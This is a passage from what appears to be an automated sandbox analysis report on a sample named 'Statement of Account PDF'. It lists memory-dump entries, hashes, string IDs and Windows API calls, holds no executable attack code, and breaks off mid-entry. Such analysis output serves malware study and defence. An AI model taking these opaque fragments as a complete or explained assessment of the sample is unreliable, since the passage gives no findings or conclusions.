                                                        • Instruction Fuzzy Hash: DD11E9B1E056588BEB58DFABD9042DEBAF7AFC8300F04D07AD519AA258DB7409458F50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $^q$$^q$$^q$$^q
                                                        • API String ID: 0-2125118731
                                                        • Opcode ID: ec2d63fc1aa53c2e5a5a7e232df09b82e73b709d2fd7f6e939f17b5762fb6f2f
                                                        • Instruction ID: 8f869f66464461c20a88cfbf7d80b89bc17d9ed4eab24e94c8a4f294ca684d31
                                                        • Opcode Fuzzy Hash: ec2d63fc1aa53c2e5a5a7e232df09b82e73b709d2fd7f6e939f17b5762fb6f2f
                                                        • Instruction Fuzzy Hash: 1541D474E00218CFEB64DF65D844B99B7B2FB49300F1080D9E54AA7355CB305E85CF52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PH^q$PH^q
                                                        • API String ID: 0-1598597984
                                                        • Opcode ID: 3ecb98ad695cff41fc5451f37d030c8e7622abf51fcb84030cb8762ed2a9c02e
                                                        • Instruction ID: 531f3dd3d2863a3474b6bfe3d62635d59276f7e29f8c478cc32557923469e739
                                                        • Opcode Fuzzy Hash: 3ecb98ad695cff41fc5451f37d030c8e7622abf51fcb84030cb8762ed2a9c02e
                                                        • Instruction Fuzzy Hash: 8CC13835A002048FCB64DF78C958A9DBBF6FF89310B2545A9E416EB3A1CB34ED45CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq$Hbq
                                                        • API String ID: 0-4258043069
                                                        • Opcode ID: e671a94c45f42b512eae84a7611f7e90f985a9d7b6310c5fc6eeb146f12575c8
                                                        • Instruction ID: bd616236a10be4ba64d0044f3fb181f3cb64e1ef39fb80fc071a18ec20beacb7
                                                        • Opcode Fuzzy Hash: e671a94c45f42b512eae84a7611f7e90f985a9d7b6310c5fc6eeb146f12575c8
                                                        • Instruction Fuzzy Hash: 22A17C74A002188FDB04EF69C5549AEBBF6FF89314F2044A9D405AB3A2CB35EC41CFA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Hbq$Hbq
                                                        • API String ID: 0-4258043069
                                                        • Opcode ID: abc88107505f9db39ae936aa88355bceec8a4b221bba47e341b04b4fe7f85f18
                                                        • Instruction ID: cd232b5109d5e2cc6636461991562f8b08d3b7531a1397e42ac3409a0c9903e7
                                                        • Opcode Fuzzy Hash: abc88107505f9db39ae936aa88355bceec8a4b221bba47e341b04b4fe7f85f18
                                                        • Instruction Fuzzy Hash: 13817C74E003598FDB04DFA9C8946EEBBF2FF88310F14812AD409AB351DB749946CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (bq$Hbq
                                                        • API String ID: 0-4081012451
                                                        • Opcode ID: 03bd2fb0a4194c59396652479c970dc03d7cc689bb1727020de73d22ff739750
                                                        • Instruction ID: 1282dd62381ec2ce541f852e506ca4b201e98315fa3269900e9f752c9341c32e
                                                        • Opcode Fuzzy Hash: 03bd2fb0a4194c59396652479c970dc03d7cc689bb1727020de73d22ff739750
                                                        • Instruction Fuzzy Hash: C8513031B041408FD718EF79C0406BABBA2FFC4344B1885BAE4499B762DE35BC86DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q
                                                        • API String ID: 0-3743469327
                                                        • Opcode ID: bf8428315e1f7ae0a4d81d386377f50a2d3711815d11849522dc6ff7f6a006c7
                                                        • Instruction ID: cf6984d3b049e067e84aeea613d675983f5be8a6fc394434a5150298667597cf
                                                        • Opcode Fuzzy Hash: bf8428315e1f7ae0a4d81d386377f50a2d3711815d11849522dc6ff7f6a006c7
                                                        • Instruction Fuzzy Hash: 5851D774E09218CFDB54DFA9D844BEDBBB6FB49300F206129E50AA7385DB349A44CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Te^q$Te^q
                                                        • API String ID: 0-3743469327
                                                        • Opcode ID: 0392d2ecb07072db1bb981ff5f505f716d597ce93891f479dc1548dbd2c35014
                                                        • Instruction ID: 5fdfa7ad9a619adb954ab35d2399af987f9efc5be51d1d97f551bd70a8fc64a3
                                                        • Opcode Fuzzy Hash: 0392d2ecb07072db1bb981ff5f505f716d597ce93891f479dc1548dbd2c35014
                                                        • Instruction Fuzzy Hash: 5C51D674E09208CFDB54DFA9D844BEDBBB6FB49300F206159E54AA7385DB349A44CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00F1BF1E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 441563b5fb676b2b7b079125278fcbf0c5f2b771fa97f1f585bc1b4cfad0f32e
                                                        • Instruction ID: 44ea33b5307de3728111786c6a176446bfb121c05dbf0c189077e22502d1ac35
                                                        • Opcode Fuzzy Hash: 441563b5fb676b2b7b079125278fcbf0c5f2b771fa97f1f585bc1b4cfad0f32e
                                                        • Instruction Fuzzy Hash: 78812370A00B05CFD728DF29D45579ABBF1BF88314F008A2DD486DBA50DB35E985DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00F15DC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: d856111a8fbc8a897b07719a8676da92783b88bf160a3a15965e68dc75811357
                                                        • Instruction ID: 11d28b16160d636c0b04cc3ca6400898d76894a3b1299de8ee8d98386e360d2e
                                                        • Opcode Fuzzy Hash: d856111a8fbc8a897b07719a8676da92783b88bf160a3a15965e68dc75811357
                                                        • Instruction Fuzzy Hash: 9D41D1B0C00719CBDB24CFA9C844BDEBBF5BF88704F24806AD408AB255DB756985CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateActCtxA.KERNEL32(?), ref: 00F15DC9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: ca0dce40dd70432b276ddb573b456f38c4a3d8ad45ad4ac64a474c862ebffe3b
                                                        • Instruction ID: 990253a494a7f95846a0c619aa2cc9a6a365270818b047e1b952e411c01ad0e1
                                                        • Opcode Fuzzy Hash: ca0dce40dd70432b276ddb573b456f38c4a3d8ad45ad4ac64a474c862ebffe3b
                                                        • Instruction Fuzzy Hash: 1741CCB0C00619CFDB24CFA9C9846DDBBB6BF88704F24816AD408AB255DB756986CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06CC9F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707322732.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6cc0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DrawText
                                                        • String ID:
                                                        • API String ID: 2175133113-0
                                                        • Opcode ID: 13cc90e52ba94fdac1b28e366674fd3f80e13a570da28d50b9e302434282cbb2
                                                        • Instruction ID: 465deca57d2e3f23604afc088afd5b5ccf9d987ffd7d0ce94626777537101e33
                                                        • Opcode Fuzzy Hash: 13cc90e52ba94fdac1b28e366674fd3f80e13a570da28d50b9e302434282cbb2
                                                        • Instruction Fuzzy Hash: BF31E0B5D002099FDB10CF9AD880ADEBBF5FB48324F14842EE819A7210D775AA45CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DrawTextExW.USER32(?,?,?,?,?,?), ref: 06CC9F77
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707322732.0000000006CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6cc0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DrawText
                                                        • String ID:
                                                        • API String ID: 2175133113-0
                                                        • Opcode ID: bae1f91370fc02edc92f5c0474328c1a595cb1b283a8dc1141ad1b8287af353e
                                                        • Instruction ID: 833bc8dc625dd975c94777f52987b05eb0683ef504916b9e39bcbfa5f0a09dcc
                                                        • Opcode Fuzzy Hash: bae1f91370fc02edc92f5c0474328c1a595cb1b283a8dc1141ad1b8287af353e
                                                        • Instruction Fuzzy Hash: 9E21CEB5D002499FDB10CF9AD884A9EBBF4BB48320F14842EE819A7210D775A944CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F1E16E,?,?,?,?,?), ref: 00F1E22F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: 9a13237f5c6c62721d81d45a105d724543e8bcf3a19ce5a3c2994f9d107a5451
                                                        • Instruction ID: a426fe2f64a71d1c4c4e0ffcdc1aa54eedca1278f3a2a7f962e7b09074eb1261
                                                        • Opcode Fuzzy Hash: 9a13237f5c6c62721d81d45a105d724543e8bcf3a19ce5a3c2994f9d107a5451
                                                        • Instruction Fuzzy Hash: F021D2B5D00248AFDB10CF9AD584AEEBBF8EB48320F14841AE958A7310D375A944DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F1E16E,?,?,?,?,?), ref: 00F1E22F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: DuplicateHandle
                                                        • String ID:
                                                        • API String ID: 3793708945-0
                                                        • Opcode ID: cd76be804cb80cc515e351bcd571bd7f7e1f5adf3a17176eda3dedce3c21b485
                                                        • Instruction ID: c2f525d2c4eed8ed96db3349f08143398ad2caab3f6543ba6f904f1e733a8ca0
                                                        • Opcode Fuzzy Hash: cd76be804cb80cc515e351bcd571bd7f7e1f5adf3a17176eda3dedce3c21b485
                                                        • Instruction Fuzzy Hash: B721E4B5D00248DFDB10CF99D584ADEBBF9FB48320F14841AE958A7260C774A954DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F1BF99,00000800,00000000,00000000), ref: 00F1C1AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f10000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 5a5339d67f89cf2a13ea0322474c5fa811d7943719abd4d47ece497854c563cd
                                                        • Instruction ID: 318721faef43b827095ec68b68a4125b7a6eba1cbe7ca6424229968c73aa5750
                                                        • Opcode Fuzzy Hash: 5a5339d67f89cf2a13ea0322474c5fa811d7943719abd4d47ece497854c563cd
                                                        • Instruction Fuzzy Hash: 481114B6D003499FDB10CF9AD444ADEFBF4EB48320F10842AE519B7211C375A945CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00F1BF99,00000800,00000000,00000000), ref: 00F1C1AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false

                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00F1BF1E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1697899463.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                        • Instruction Fuzzy Hash: 5D613BB4D19209EFCB14CFE9D4446EEBBBAFF9A300F10942AE419A7255D7309946CF40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0ac697cb3d71c18e1258feb90e3c87fb06df5078b722db165525f093414b922
                                                        • Instruction ID: fb6d9cd19fde4d178a58115384bda30af1e5a52bdd802da81e04a65498d3399f
                                                        • Opcode Fuzzy Hash: c0ac697cb3d71c18e1258feb90e3c87fb06df5078b722db165525f093414b922
                                                        • Instruction Fuzzy Hash: 01717C74A01208EFCB15DFA9D894DAEBBB6FF48724B514498F901AB361DB31EC81CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 341c1a6fb7eb9fcf28221bbb01f5302a2faeed2d695e2782d72ec7e3f1685b91
                                                        • Instruction ID: c363a50562c2a838cf4c47743054977c5333308592d20c285ef506fabc7ca149
                                                        • Opcode Fuzzy Hash: 341c1a6fb7eb9fcf28221bbb01f5302a2faeed2d695e2782d72ec7e3f1685b91
                                                        • Instruction Fuzzy Hash: C7519032A0050A9FDF10CFA6DC40AFEB3B6EF85754F0984A6E904EB261D775E906CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0650b7977a66f1276f872e6e7c18b7dea390d6fb59912bf8c8390cde211a1aa0
                                                        • Instruction ID: a2e7e3654c54faf8e3bb978d54a7d259bcdef0d469e9cfd38c03433364ec4565
                                                        • Opcode Fuzzy Hash: 0650b7977a66f1276f872e6e7c18b7dea390d6fb59912bf8c8390cde211a1aa0
                                                        • Instruction Fuzzy Hash: CC518E71E002499FDB14DFAAD844ABFBBF9EFC8310F10846AD455E7250DB34A945CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 920dc6a023720a175a48c9f667a6820aa44315c2c0b519826e8b6a76a415a6ef
                                                        • Instruction ID: bab387bf393558111e6540477f6f42147db0fe4c86e95fe68af4055b53692407
                                                        • Opcode Fuzzy Hash: 920dc6a023720a175a48c9f667a6820aa44315c2c0b519826e8b6a76a415a6ef
                                                        • Instruction Fuzzy Hash: CA51B0317002008FD714AF69D494AEE7BF6EF89304F1449A9D10ADB362DB75EC45DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: aaf43fde2719f514430f0c3c87d6f271f62ae7eec1e6de0c543cad1134a6224a
                                                        • Instruction ID: b4048506a326832f55836405a82a1aacc533ff92a66326fed57c2a8b0d0950f3
                                                        • Opcode Fuzzy Hash: aaf43fde2719f514430f0c3c87d6f271f62ae7eec1e6de0c543cad1134a6224a
                                                        • Instruction Fuzzy Hash: 6E418E74E092188FDB44CFAAD8446EEBBF6EF8D301F14D02DE419A7251D7344A40CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7a1caee21e2321cc6e0b1505321c38315e2ad6a0fd40b3967f9a6021fc65c6c
                                                        • Instruction ID: f1a75613562221b0c17a58f0d8bfc5152e06362590e83730f8ee08cc994d2fc5
                                                        • Opcode Fuzzy Hash: b7a1caee21e2321cc6e0b1505321c38315e2ad6a0fd40b3967f9a6021fc65c6c
                                                        • Instruction Fuzzy Hash: 6B51B278A11208AFCB14DF69D894DADBBB2FF49724B114498F901AB361DB31EC81CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a30f908ca0bbabfbced8adfa43c25fed5d328895402b4065974350248ec4c2e
                                                        • Instruction ID: c02e2daaa343bee939136e613eda25606b3155f6f5cda714791090342432ab4a
                                                        • Opcode Fuzzy Hash: 2a30f908ca0bbabfbced8adfa43c25fed5d328895402b4065974350248ec4c2e
                                                        • Instruction Fuzzy Hash: 11418175E002088FEB14EFB6D0506BDBAB2EFC8618F14547DD501AB284DB38A981CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b41d9e7f48e938e257ed63e37789171e3111a5e5228db82f9be1e0fca679506d
                                                        • Instruction ID: 08de39e9c4cf0581a7f6b3c7c0321568ad00bbfdaa3b589831ee2bd336171f26
                                                        • Opcode Fuzzy Hash: b41d9e7f48e938e257ed63e37789171e3111a5e5228db82f9be1e0fca679506d
                                                        • Instruction Fuzzy Hash: CF41D4307006018FD7A59F25C894B7EB3F2BF85324F14856ED0158BBA1CB71AD56CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a5b4fa052703c99b5c9d16e23c69252e5374d01863bb712fc3719d845b5164ce
                                                        • Instruction ID: 13729e6126bc4ca4ce9f299d0dd5fc19e0863f9fca82295e1c9e0f548a06c734
                                                        • Opcode Fuzzy Hash: a5b4fa052703c99b5c9d16e23c69252e5374d01863bb712fc3719d845b5164ce
                                                        • Instruction Fuzzy Hash: 8F410734A002198FDB14EFA9C855BEDB7B1BF89314F114068E505BB3A1DB79E845CFA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 164f6b5286f0f1b8196bc6da0145581a262cdd1d6cc4a17f7099a43a779b59cc
                                                        • Instruction ID: 5b0effd946b423b327994f590aa086c748103fe5c18fbc042df84c77657eefab
                                                        • Opcode Fuzzy Hash: 164f6b5286f0f1b8196bc6da0145581a262cdd1d6cc4a17f7099a43a779b59cc
                                                        • Instruction Fuzzy Hash: E5417E307006019FD7A9AF25C894B6EB3B2BF85324F14862DD1168B7A0CB71ED46DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 830b6744617cbd93dd86b7a78a1b7fcad3a620f2cfac0bf7b65da0eb1630b024
                                                        • Instruction ID: cd11b35d1748ff68660173d3192d9c8c1422a83cfc3677249e2bbb881d7ee6ef
                                                        • Opcode Fuzzy Hash: 830b6744617cbd93dd86b7a78a1b7fcad3a620f2cfac0bf7b65da0eb1630b024
                                                        • Instruction Fuzzy Hash: B04104B1D00359CFDB10DFAAC584ADEBBB1BF48304F24802AD408AB251D775AA4ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1707419050.0000000006CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6ce0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 934b718e558af25d204acef514f419dd63a58fbc65dbcc2ed9e47e009c4e04a1
                                                        • Instruction ID: 180b2683937144b8843e6866d05e5d28ac3df7fc52410982b9a3b097e135c5d3
                                                        • Opcode Fuzzy Hash: 934b718e558af25d204acef514f419dd63a58fbc65dbcc2ed9e47e009c4e04a1
                                                        • Instruction Fuzzy Hash: 4F413E34E111098BDB54DBA9D994BAEBBF2BF88700F24856AE511B7350DB719D01CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04730bef0997442d5b447129dd7bd6800e2d868f3e399d9ba236f46313eb899d
                                                        • Instruction ID: 39585fe1f8c53b3451f727135eada7fe694cc1c7cdd5d4e33dfb7de7cb4483e8
                                                        • Opcode Fuzzy Hash: 04730bef0997442d5b447129dd7bd6800e2d868f3e399d9ba236f46313eb899d
                                                        • Instruction Fuzzy Hash: 7331B475E002058BEB14EB76C0546FE7BB2EF84208F10547DC502AB280DB79A982CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75de8b869ab167abfaca5f5c7d4884f42abf956cbd90f4ad3d67c9763aea5231
                                                        • Instruction ID: 07a95caed4fb5843efe63ec338f8d20120b01b86932caa366fb433853e3df07d
                                                        • Opcode Fuzzy Hash: 75de8b869ab167abfaca5f5c7d4884f42abf956cbd90f4ad3d67c9763aea5231
                                                        • Instruction Fuzzy Hash: 8531D231A04659DBCF00CFA9E8904BE7BB5FF85708F14856AE804DB256F636DC46C7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1706038482.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_4ee0000_Statement of Account PDF.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ca2cb7edf2e5dd55141cbf0ae7789ada28005222d220ecc07777f9731f933f95
                                                        • Instruction ID: ea483ffe182fbf278bea9c87a99fa1456491c63d6fb905775e8cad05599db668
                                                        • Opcode Fuzzy Hash: ca2cb7edf2e5dd55141cbf0ae7789ada28005222d220ecc07777f9731f933f95
                                                        • Instruction Fuzzy Hash: 9441D1B1D0020DDFDB10CFAAC984ADEBBB5BF48304F248029D418BB254D775AA4ACF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
